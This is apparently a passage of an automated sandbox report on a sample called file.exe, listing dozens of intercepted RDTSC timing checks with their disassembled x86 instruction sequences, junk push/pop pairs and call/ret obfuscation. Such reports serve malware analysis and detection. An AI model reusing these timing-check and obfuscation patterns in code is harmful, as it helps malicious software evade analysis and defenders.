Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92972F second address: 929737 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9299FC second address: 929A02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 929A02 second address: 929A07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 929B25 second address: 929B4C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FFA70D2D1A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FFA70D2D1B7h 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 929B4C second address: 929B50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 929B50 second address: 929B54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 929B54 second address: 929B6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007FFA707966E2h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 929CCE second address: 929CF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 push edx 0x00000009 jmp 00007FFA70D2D1B9h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 929E81 second address: 929E8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007FFA707966D6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92A90A second address: 92A913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92ACC3 second address: 92ACC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92ACC7 second address: 92ACD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92ACD0 second address: 92ACF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jng 00007FFA707966ECh 0x0000000b popad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92ACF7 second address: 92ACFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92DD81 second address: 92DDA1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jng 00007FFA707966D6h 0x00000012 jmp 00007FFA707966DCh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92DDA1 second address: 92DDA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92DDA9 second address: 92DDC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FFA707966D6h 0x0000000a jmp 00007FFA707966DFh 0x0000000f jno 00007FFA707966D6h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 931992 second address: 931997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 931997 second address: 93199C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93199C second address: 9319AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 930075 second address: 930096 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA707966DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007FFA707966DCh 0x00000012 jc 00007FFA707966D6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 936C72 second address: 936C7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jno 00007FFA70D2D1A6h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 936C7F second address: 936C89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FFA707966D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 936C89 second address: 936CAB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FFA70D2D1B2h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 936538 second address: 93653C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93653C second address: 936545 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 936AB6 second address: 936ADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFA707966DBh 0x00000009 jmp 00007FFA707966E9h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 936ADF second address: 936AF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFA70D2D1B1h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 936AF5 second address: 936B06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFA707966DBh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9392ED second address: 9392F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FFA70D2D1A6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9392F8 second address: 939302 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FFA707966D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 939302 second address: 939364 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007FFA70D2D1A8h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 jnp 00007FFA70D2D1A6h 0x00000029 pushad 0x0000002a movzx esi, dx 0x0000002d mov cl, al 0x0000002f popad 0x00000030 call 00007FFA70D2D1A9h 0x00000035 jmp 00007FFA70D2D1B8h 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d jc 00007FFA70D2D1A8h 0x00000043 pushad 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 939364 second address: 939391 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA707966DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jg 00007FFA707966E8h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 939391 second address: 939397 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 939397 second address: 9393A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 939A76 second address: 939A92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FFA70D2D1B4h 0x0000000e jmp 00007FFA70D2D1AEh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 939B5B second address: 939B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 js 00007FFA707966D6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 939B67 second address: 939B6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 939B6B second address: 939B83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b jmp 00007FFA707966DCh 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 939B83 second address: 939B89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 939B89 second address: 939B8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 939B8D second address: 939B91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93A19A second address: 93A1B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA707966DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007FFA707966D6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93A1B6 second address: 93A1BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93A3BE second address: 93A3C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93A3C2 second address: 93A3C8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93A3C8 second address: 93A3CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93A3CE second address: 93A3D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93A44E second address: 93A454 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93A454 second address: 93A46D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+122D37D1h], esi 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93A46D second address: 93A472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93A472 second address: 93A478 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93A9A9 second address: 93A9AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 901198 second address: 9011B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFA70D2D1B9h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9011B6 second address: 9011D9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FFA707966E8h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93D93E second address: 93D944 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93D944 second address: 93D9AF instructions: 0x00000000 rdtsc 0x00000002 jng 00007FFA707966D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007FFA707966D8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push edx 0x0000002c call 00007FFA707966D8h 0x00000031 pop edx 0x00000032 mov dword ptr [esp+04h], edx 0x00000036 add dword ptr [esp+04h], 0000001Ch 0x0000003e inc edx 0x0000003f push edx 0x00000040 ret 0x00000041 pop edx 0x00000042 ret 0x00000043 mov esi, dword ptr [ebp+124622CAh] 0x00000049 push 00000000h 0x0000004b mov edi, 41EA4416h 0x00000050 xchg eax, ebx 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 jc 00007FFA707966D6h 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93D9AF second address: 93D9E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA70D2D1B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FFA70D2D1B4h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93D9E0 second address: 93D9EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FFA707966D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93E4BA second address: 93E4C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93E1DA second address: 93E1E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93E4C0 second address: 93E4C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93E1E0 second address: 93E1F3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007FFA707966D8h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93FB20 second address: 93FB2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA70D2D1AAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93FB2E second address: 93FB9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FFA707966DCh 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007FFA707966D8h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 push 00000000h 0x0000002b call 00007FFA707966E0h 0x00000030 and edi, dword ptr [ebp+122D2DE8h] 0x00000036 pop edi 0x00000037 push 00000000h 0x00000039 xchg eax, ebx 0x0000003a jmp 00007FFA707966E3h 0x0000003f push eax 0x00000040 jng 00007FFA707966E8h 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93FB9E second address: 93FBA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93FBA2 second address: 93FBA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 940F6C second address: 940FD5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FFA70D2D1B9h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 cmc 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007FFA70D2D1A8h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 00000016h 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d mov dword ptr [ebp+1244F564h], ebx 0x00000033 xchg eax, ebx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FFA70D2D1B9h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 940FD5 second address: 940FEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA707966E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 940FEE second address: 941018 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FFA70D2D1B1h 0x00000008 jmp 00007FFA70D2D1ABh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FFA70D2D1B2h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 941018 second address: 94102C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA707966E0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 943479 second address: 94347D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9448E2 second address: 9448ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 945F42 second address: 945F46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 945F46 second address: 945F50 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 945F50 second address: 945F60 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007FFA70D2D1A6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 945F60 second address: 945F64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 946574 second address: 946589 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA70D2D1B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 946589 second address: 946593 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FFA707966D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 948573 second address: 948578 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94682B second address: 94682F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94B6BE second address: 94B6F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 mov dword ptr [esp], eax 0x00000009 call 00007FFA70D2D1ABh 0x0000000e mov bx, 78E4h 0x00000012 pop ebx 0x00000013 push 00000000h 0x00000015 mov dword ptr [ebp+124501C2h], eax 0x0000001b push 00000000h 0x0000001d jmp 00007FFA70D2D1B2h 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94B6F9 second address: 94B6FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94B6FF second address: 94B704 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94B94B second address: 94B94F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94B94F second address: 94B959 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FFA70D2D1A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94D805 second address: 94D809 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94D809 second address: 94D816 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94D816 second address: 94D821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FFA707966D6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94F88F second address: 94F932 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA70D2D1AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007FFA70D2D1A8h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 jmp 00007FFA70D2D1AEh 0x0000002a jg 00007FFA70D2D1ACh 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push edx 0x00000035 call 00007FFA70D2D1A8h 0x0000003a pop edx 0x0000003b mov dword ptr [esp+04h], edx 0x0000003f add dword ptr [esp+04h], 0000001Ah 0x00000047 inc edx 0x00000048 push edx 0x00000049 ret 0x0000004a pop edx 0x0000004b ret 0x0000004c cld 0x0000004d push 00000000h 0x0000004f xor edi, 2D1FA8F6h 0x00000055 xchg eax, esi 0x00000056 push eax 0x00000057 jmp 00007FFA70D2D1B1h 0x0000005c pop eax 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 jnl 00007FFA70D2D1ACh 